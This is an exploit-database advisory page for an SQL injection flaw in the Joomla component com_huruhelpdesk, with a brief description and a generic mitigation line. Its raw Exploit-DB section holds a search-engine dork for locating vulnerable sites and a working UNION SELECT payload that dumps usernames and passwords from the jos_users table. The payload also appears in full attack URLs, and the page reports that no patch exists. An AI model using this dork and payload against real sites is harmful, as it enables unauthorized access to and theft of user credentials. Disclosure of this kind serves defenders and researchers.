Joomla Component com_huruhelpdesk SQL Injection Vulnerability

vendor:

com_huruhelpdesk

by:

Amine_92

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: com_huruhelpdesk

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Joomla Component com_huruhelpdesk SQL Injection Vulnerability

A SQL injection vulnerability exists in the Joomla Component com_huruhelpdesk. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information from the database, such as usernames and passwords.

Mitigation:

Developers should always sanitize user input and use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

====================================================
Joomla Component com_huruhelpdesk SQL Injection Vulnerability
===================================================

Author :   Amine_92
Email  : [amine92_16@hotmail.fr]
Homepage : { www.vbhacker.net/vb }
DORK    :  inurl:"index.php?option=com_huruhelpdesk"
===================================================

[+] Vulnerable File :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=[SQL]

[+] ExploiT :
-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--

[+] Example :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--
[+] Demo :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--

====================================================
Thank's to :awras,italiano_capilo & all my friends